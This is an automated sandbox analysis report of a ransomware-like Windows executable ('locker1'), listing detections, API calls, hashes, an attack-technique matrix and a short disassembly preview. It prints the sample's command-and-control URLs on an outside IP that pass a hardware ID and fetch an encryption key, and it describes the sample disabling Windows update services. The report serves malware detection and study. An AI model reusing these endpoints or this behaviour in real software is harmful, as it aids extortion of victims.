Edit tour

Windows Analysis Report
PC4rbXSgl4.exe

Overview

General Information

Sample name:	PC4rbXSgl4.exe renamed because original name is a hash value
Original sample name:	8cee3ec87a5728be17f838f526d7ef3a842ce8956fe101ed247a5eb1494c579d.exe
Analysis ID:	1539283
MD5:	12b818950d749c378aabd81a0bac9742
SHA1:	e014c9e5f712775e771c7f36d2a580d8d290c9ad
SHA256:	8cee3ec87a5728be17f838f526d7ef3a842ce8956fe101ed247a5eb1494c579d
Tags:	exeuser-lasq88
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Program does not show much activity (idle)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

PC4rbXSgl4.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\PC4rbXSgl4.exe" MD5: 12B818950D749C378AABD81A0BAC9742)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PC4rbXSgl4.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: PC4rbXSgl4.exe

ReversingLabs: Detection: 45%

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18B7A80 BCryptGenRandom,BCryptCloseAlgorithmProvider,free,SetLastError,_CxxThrowException,	0_2_00007FF6F18B7A80
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18B78F0 BCryptGenRandom,SetLastError,_CxxThrowException,SetLastError,_CxxThrowException,	0_2_00007FF6F18B78F0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18B78A0 BCryptCloseAlgorithmProvider,	0_2_00007FF6F18B78A0

Source: PC4rbXSgl4.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: 7C:\Users\shade\source\repos\locker1\x64\Release\locker1.pdbUU source: PC4rbXSgl4.exe
Source:	Binary string: C:\Users\shade\source\repos\locker1\x64\Release\locker1.pdb source: PC4rbXSgl4.exe

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CD5D8 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,		0_2_00007FF6F18CD5D8
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CD564 FindClose,abort,FindFirstFileExW,GetLastError,		0_2_00007FF6F18CD564

Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.187
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.187
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.187
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.187
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.187

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe

Code function: 0_2_00007FF6F18A5A50 ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,InternetOpenW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,GetLastError,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,InternetCrackUrlW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,GetLastError,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,InternetCloseHandle,InternetConnectW,HttpOpenRequestW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,GetLastError,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,InternetCloseHandle,HttpSendRequestW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,GetLastError,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,

0_2_00007FF6F18A5A50

Source: global traffic

HTTP traffic detected: GET /api/upload.php?locker=test&amount=10&owner=6&hwid=l7NtZkdgeMq5CGbABNg1whI0E8CPHhHD HTTP/1.1Accept: text/*User-Agent: EncryptorHost: 77.91.77.187

Source: PC4rbXSgl4.exe, 00000000.00000002.1743602132.00000177FCAB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.187/
Source: PC4rbXSgl4.exe	String found in binary or memory: http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=
Source: PC4rbXSgl4.exe	String found in binary or memory: http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=Failed
Source: PC4rbXSgl4.exe, 00000000.00000002.1743602132.00000177FCA4C000.00000004.00000020.00020000.00000000.sdmp, ConDrv.0.dr	String found in binary or memory: http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=l7NtZkdgeMq5CGbABNg1whI0E8CPHh
Source: PC4rbXSgl4.exe	String found in binary or memory: http://77.91.77.187/panel/chat/create_chat.php?admin=6&chat_id=
Source: PC4rbXSgl4.exe	String found in binary or memory: http://77.91.77.187/panel/chat/create_chat.php?admin=6&chat_id=Failed

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18A5A50	0_2_00007FF6F18A5A50
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18C48C0	0_2_00007FF6F18C48C0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18A7930	0_2_00007FF6F18A7930
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18C92D0	0_2_00007FF6F18C92D0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CB2B8	0_2_00007FF6F18CB2B8
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18C6A90	0_2_00007FF6F18C6A90
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18C42B0	0_2_00007FF6F18C42B0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CCAB0	0_2_00007FF6F18CCAB0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18AF2A0	0_2_00007FF6F18AF2A0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18B6CFF	0_2_00007FF6F18B6CFF
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CAC60	0_2_00007FF6F18CAC60
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18AFC00	0_2_00007FF6F18AFC00
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18A5350	0_2_00007FF6F18A5350
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18C5380	0_2_00007FF6F18C5380
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CAE76	0_2_00007FF6F18CAE76
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CD5D8	0_2_00007FF6F18CD5D8
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18B6E19	0_2_00007FF6F18B6E19
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18A3550	0_2_00007FF6F18A3550
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CB538	0_2_00007FF6F18CB538
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CC570	0_2_00007FF6F18CC570
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18C40D0	0_2_00007FF6F18C40D0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CA0A0	0_2_00007FF6F18CA0A0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18B67F0	0_2_00007FF6F18B67F0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18B5030	0_2_00007FF6F18B5030
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18A5F40	0_2_00007FF6F18A5F40
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18AE790	0_2_00007FF6F18AE790

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe

Code function: String function: 00007FF6F18AB370 appears 34 times

Source: classification engine

Classification label: mal56.winEXE@2/1@0/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03

Source: PC4rbXSgl4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PC4rbXSgl4.exe

ReversingLabs: Detection: 45%

Source: unknown	Process created: C:\Users\user\Desktop\PC4rbXSgl4.exe "C:\Users\user\Desktop\PC4rbXSgl4.exe"
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: PC4rbXSgl4.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: PC4rbXSgl4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PC4rbXSgl4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PC4rbXSgl4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PC4rbXSgl4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PC4rbXSgl4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PC4rbXSgl4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: PC4rbXSgl4.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: PC4rbXSgl4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: 7C:\Users\shade\source\repos\locker1\x64\Release\locker1.pdbUU source: PC4rbXSgl4.exe
Source:	Binary string: C:\Users\shade\source\repos\locker1\x64\Release\locker1.pdb source: PC4rbXSgl4.exe

Source: PC4rbXSgl4.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PC4rbXSgl4.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PC4rbXSgl4.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PC4rbXSgl4.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PC4rbXSgl4.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe

API coverage: 6.1 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CD5D8 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,		0_2_00007FF6F18CD5D8
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CD564 FindClose,abort,FindFirstFileExW,GetLastError,		0_2_00007FF6F18CD564

Source: PC4rbXSgl4.exe, 00000000.00000002.1743602132.00000177FCA4C000.00000004.00000020.00020000.00000000.sdmp, PC4rbXSgl4.exe, 00000000.00000002.1743602132.00000177FCAC5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe

Code function: 0_2_00007FF6F18CEAC8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6F18CEAC8

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CE0C0 SetUnhandledExceptionFilter,_set_new_mode,	0_2_00007FF6F18CE0C0
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CEAC8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6F18CEAC8
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CEC6C SetUnhandledExceptionFilter,	0_2_00007FF6F18CEC6C
Source: C:\Users\user\Desktop\PC4rbXSgl4.exe	Code function: 0_2_00007FF6F18CDC10 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6F18CDC10

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe

Code function: GetLocaleInfoEx,FormatMessageA,

0_2_00007FF6F18CD1AC

Source: C:\Users\user\Desktop\PC4rbXSgl4.exe

Code function: 0_2_00007FF6F18CE9C4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF6F18CE9C4

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Process Injection	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PC4rbXSgl4.exe	46%	ReversingLabs	Win64.Trojan.Generic
PC4rbXSgl4.exe	100%	Avira	TR/AVI.Agent.zvnls

Name	Source	Malicious	Reputation
http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=	PC4rbXSgl4.exe	false	unknown
http://77.91.77.187/panel/chat/create_chat.php?admin=6&chat_id=	PC4rbXSgl4.exe	false	unknown
http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=Failed	PC4rbXSgl4.exe	false	unknown
http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=l7NtZkdgeMq5CGbABNg1whI0E8CPHh	PC4rbXSgl4.exe, 00000000.00000002.1743602132.00000177FCA4C000.00000004.00000020.00020000.00000000.sdmp, ConDrv.0.dr	false	unknown
http://77.91.77.187/panel/chat/create_chat.php?admin=6&chat_id=Failed	PC4rbXSgl4.exe	false	unknown
http://77.91.77.187/	PC4rbXSgl4.exe, 00000000.00000002.1743602132.00000177FCAB5000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
77.91.77.187	unknown	Russian Federation		42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1539283
Start date and time:	2024-10-22 14:44:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PC4rbXSgl4.exe renamed because original name is a hash value
Original Sample Name:	8cee3ec87a5728be17f838f526d7ef3a842ce8956fe101ed247a5eb1494c579d.exe
Detection:	MAL
Classification:	mal56.winEXE@2/1@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 14 Number of non-executed functions: 102
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: PC4rbXSgl4.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	file.exe	Get hash	malicious	Phorpiex	Browse	77.91.77.92
	i52xoegJro.exe	Get hash	malicious	Amadey	Browse	77.91.77.82
	Jl5yg1Km2s.exe	Get hash	malicious	Amadey	Browse	77.91.77.82
	file.exe	Get hash	malicious	Vidar	Browse	77.91.101.71
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	77.91.101.71
	file.exe	Get hash	malicious	Vidar	Browse	77.91.101.71
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	77.91.101.71
	Setup .exe	Get hash	malicious	Go Injector, MicroClip, Vidar, Xmrig	Browse	77.91.101.71
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	77.91.77.82
	Nin6JE44ky.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	77.91.77.82

Process:	C:\Users\user\Desktop\PC4rbXSgl4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	319
Entropy (8bit):	5.222748414513361
Encrypted:	false
SSDEEP:	6:/KqdXKo+KL0qdNsQXeow6ROosE4gHlLCs69Y9Wfok3JTGUqbDf+Vs://ao+KZ+QXeoZR2lMlLCsGY9WhTGxeVs
MD5:	9E7B531B776DC68770D5BAFFF1CF0222
SHA1:	CBE0066AB258599F041F196EA531A63A27130B99
SHA-256:	F3FAC3E83050494A7F4F77FE880F762CAB715F01DC76B9192C05D6C47CD4F315
SHA-512:	99B200AAD9467CA1A95DF9B56E49ECA91E8B147A5C8205C3C3EBB2FADFCB32449FC2962D9AECBF0602FEA0F337193A45DDEC5E72C18026E145761B06ABCB46A5
Malicious:	false
Reputation:	low
Preview:	ControlService failed for wuauserv with error: 1062..ControlService failed for BITS with error: 1062..Making GET request to: http://77.91.77.187/api/upload.php?locker=test&amount=10&owner=6&hwid=l7NtZkdgeMq5CGbABNg1whI0E8CPHhHD..HttpSendRequest failed with error: 12152..Failed to retrieve encryption key from PHP app..

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.292529485447728
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PC4rbXSgl4.exe
File size:	300'544 bytes
MD5:	12b818950d749c378aabd81a0bac9742
SHA1:	e014c9e5f712775e771c7f36d2a580d8d290c9ad
SHA256:	8cee3ec87a5728be17f838f526d7ef3a842ce8956fe101ed247a5eb1494c579d
SHA512:	77d6abeee1e8bcff6d69cba0c1c1f4d22db65acdd66540abe7d2f928c9e97f56c4f2333601aab07b0e399a6a02654a81b376ebcf816221e4ba139d4d25afb7c9
SSDEEP:	6144:6PC+IjUePMPCYtXJyVvWYgeWYg955/155/U0gwnMxNqH6VrmN:cC3UBdtXJyVvWYgeWYg955/155/Un
TLSH:	DB544A17E7A92CE8F9ABE07C89578549E7B2BC644712C7CF1390670E2E636D09D3E640
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Qz*.0.y.0.y.0.y.H.y.0.y...x.0.y...x.0.y...x.0.y...x.0.y...x.0.y...x.0.y.H.x.0.y.0.y.1.y...x.0.y...y.0.y...x.0.yRich.0.y.......

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x14002e258
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6685AAAA [Wed Jul 3 19:46:50 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	903a7bfdd677cb763994ef73de28e499

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FC2F9094818h
dec eax
add esp, 28h
jmp 00007FC2F9093F27h
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007FC2F90940C2h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007FC2F90940C5h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007FC2F90940BDh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007FC2F90939BEh
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ecx
mov ebx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007FC2F9094021h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4250c	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4d000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x4a000	0x2604	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4e000	0xc28	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x38330	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x38400	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x381f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x31000	0x638	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
